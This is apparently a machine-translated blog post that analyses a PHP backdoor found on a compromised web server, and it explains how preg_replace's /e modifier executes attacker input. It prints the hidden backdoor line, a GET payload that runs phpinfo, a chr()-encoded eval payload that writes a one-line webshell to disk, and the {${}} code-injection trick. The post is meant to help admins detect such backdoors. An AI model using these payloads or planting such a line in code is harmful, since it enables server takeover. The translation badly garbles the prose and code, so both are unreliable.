PHP back door has a lot of, the steamed stuffed bun also see more and play more, but in time to help friends, when check the server unexpectedly found such malicious code

the thing is, the friend's web site using a variety of tools to find the back door of the Trojan PHP is not found. Always can't find the little black trick is very advanced, after each use always cross out the back door, but every time can continue to come in, always can't find where come in. This is really hurt.
 
later, finally found in the log traces, through the analysis of I, I found an IP is always very strange POST data to a file. Then after a period of time, the IP access a baffled file, the name is very conspicuous is obviously not normal system files, but PHP the back door. But it is deleted soon after use the back door.
 
haha, met the little black quite carefully.
 
and then through the analysis discovered that the little black access file found code:
 
@ preg_replace (&other//e” and $_POST [' IN_COMSENZ], &throughout; Access Denied”) ;
 
if you see this code is also no problem, but, this is the little black hidden malicious code and the back door. Hidden, generally do not any killing software killing.
 
preg_replace function prototypes:
 
mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])
 
declaration:
 
/e modifier make preg_replace () will replacement parameters as PHP code in the appropriate reverse references to replace () after. Tip: to ensure that replacement constitute a legitimate PHP code strings, or PHP will report in contains preg_replace () line appear in the syntax parsing errors.
 
the code above is to accept data to test, POST more troublesome, if to GET access to data...
 
example:
 
  Echo preg_replace (&other/test/e” the $_GET [" h"], &throughout; jutst test”) ;
 
if we submit? H=a phpinfo (), a phpinfo () will be performed (using the/e modifier, preg_replace will replacement parameters as PHP code execution).
 
if we are going to the POST, we test to submit the following code?
 
h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
 
corresponding plaintext cipher text is:
 
fputs (fopen (data/Amy polumbo HP, w));
 
the result of the execution is in/data/directory to generate a Trojan horse Amy polumbo HP a word.
 
this is scary...
 
one more difficult example:
 
 

code is as follows:


<?
the function test ($STR)

attach echo preg_replace (&other/PHP/s * (. +?) [/PHP] s */ies”, ‘ test (&other \ 1 &Prime) ’ the $_GET [" h "]);
? >

to submit? H=a phpinfo (), a phpinfo () will be performed?
 
wouldn't do that. Because after regular matching replacement parameters into ’ The test (&other phpinfo”) ’ When a phpinfo only is treated as a string parameter.
 
is there any way to perform it?
 
b: of course. If we submit here? H={${a phpinfo ()}}, a phpinfo () will be executed. Why is that?
 
in PHP, inside double quotes if contains variables, PHP interpreter will replace them with variable explanation of the results; Variables in single quotation marks will not be processed.
 
note: the function of double quotation marks will not be executed and replace.
 
we need here by {${}} constructed a special variable, ’ The test (&other {${a phpinfo ()}} &throughout;) ’ To achieve the effect of let function is executed (${a phpinfo ()} will be interpreted execution).
 
can do the following tests:
 
echo &other; {${a phpinfo ()}} throughout the &;; A phpinfo will be successfully carried out.
 
so, you find the note to find the back door.
 
OK, say so much, also understand, I will give the code above:
 
  @ preg_replace (&other//e” and $_POST [' IN_COMSENZ], &throughout; Access Denied”) ;
 
code that looks very normal, is actually an extremely dangerous code, hidden deeply. Ha ha. I hope it can help you
 
the author: hefei manufacturing


This concludes the body part